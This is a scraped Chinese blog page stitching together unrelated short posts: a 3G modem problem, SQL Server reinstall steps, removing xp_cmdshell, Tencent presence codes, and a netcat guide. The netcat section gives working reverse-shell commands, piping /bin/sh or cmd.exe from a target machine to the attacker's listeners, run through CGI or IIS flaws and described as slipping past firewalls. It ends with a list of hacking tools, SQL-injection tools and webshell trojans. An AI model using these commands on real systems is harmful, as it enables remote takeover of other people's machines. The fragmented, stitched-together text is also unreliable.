|
出没于网
Goldtimes.net 互联网重回黄金时代! |
国内唯一诚信、实用、合法的网络赚钱指南网站 | ||
| 日志首页 | 互联网 | 技术新知 | Goldtimes | Linux | .NET | JavaScript | AJAX | ASP | MSSql | PHP | MySql | Flash | 收藏 | 站长手记 | |||
|
|
这是一篇隐藏日志,只有管理员才能观看,请先登录 我的电脑是t400,xp系统。成功安装中国电信3g无线网卡驱动程序和连接程序,却不能上网!(我在其他电脑上,诸如联想天逸f41笔记本能够上网!另外,用无线路由器上网,t400也可以上网,连接速度为54m,说明无线网卡设备没有任何问题)。总之,t400—xp系统不能电信3g上网?
以前装过sql server,后来删掉。现在重装,却出现“以前的某个程序安装已在安装计算机上创建挂起的文件操作。运行安装程序之前必须重新启动计算机”错误。无法进行下去。 参考网上资料,总算搞定。步骤是: 1)添加/删除程序中彻底删除sql server。 2)将没有删除的sql server目录也删除掉。 3)打开注册表编辑器,在hkey_local_machine\system\currentcontrolset\control\session manager中找到pendingfilerenameoperations项目,并删除它。这样就可以清除安装暂挂项目。 4)删除注册表中跟sql server相关的键。 其实估计只要做第3步就可以搞定,这样就可以清除安装暂挂项目。自己是先走了1,2,4,最后做了3才搞定。所以估计3才是最关键的。 删除xp_cmdshell
use master exec sp_dropextendedproc 'xp_cmdshell'
===========================================
use master =============================================== 大家都知道腾讯有个互动状态代码生成页,http://is.qq.com/webpresence/code.shtml,能很方便的生成互动按钮。但是腾讯的这个页面改过版了,我是今天才发现的。用以前的代码已经不能点击打开聊天窗口了,生成的新代码比以前长了,多了个sigkey,64位的 nc 想要连接到某处: nc [-options] xxx.xxx.xxx.xxx [ports]
如何用nc建立反向通道
使用nc创建一个从目标机器到攻击者自己的机器的反向通道。因为从目标机器发起连接,通常防火墙不会阻挡。 攻击者机器:开两个窗口(or 两个终端)机器类型不限 nc -l -n -v -p 80 (该窗口用来输入命令) nc -l -n -v -p 25 (该窗口用来得到输出) 目标机器: 通过cgi的毛病或者iis的毛病来运行该指令 nc 攻击者机器 80 | /bin/sh | nc 攻击者机器 25 nc 攻击者机器 80 | c:\winnt\system32\cmd.exe | nc 攻击者机器 25 (对于windows nt作为目标的情况) 这个时候从nc监听80的那个窗口输入命令,就可以从监听25那个窗口看到结果了。 没解决的问题: hacking exposed上说是完全可以用telnet来运行的。也就是上面在目标机器执行的nc都是可以用telnet来取代,它是假设目标机器没有nc这个工具的。实际上我研究不出来。不灵,只能连接一下,马上就断了。
目标机器有nc的情况,不过这个nc要有-e参数。windows下的nc.exe默认就是有-e参数。而unix下的默认是没有的。具体原因是要在netcat.c里打开一个已经#define gaping_security_hole选项。不过什么原因我不懂,就直接把sinbad改好的netcat.c发过来好了。 攻击者机器: nc -l -n -v -p 80 目标机器: nc -e /bin/sh 攻击者机器 80 (这个时候该窗口将得到交互式的shell) nc -e c:\winnt\system32\cmd.exe 攻击者机器 80
-d 后台模式 端口的表示方法可写为m-n的范围格式。
大概有以下几种用法: 1)连接到remote主机,例子:
============================================================== 6)作攻击程序用,例子: 附:c:exploit.txt为shellcode等
附:c:log.txt为日志等
wsockexpert
nbsi2 hdsi pangolin_bin
海阳顶端木马
蓝屏木马
黑客之家php木马
sqlinjectencode
sqlinjec encode 小葵多功能转换工具 nc.exe
winhex cookies&injest cookies&browser form-bst httppost
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Powered by Goldtimes.net © 2005-04 , Processed in 0.093750 second(s) , 5 queries |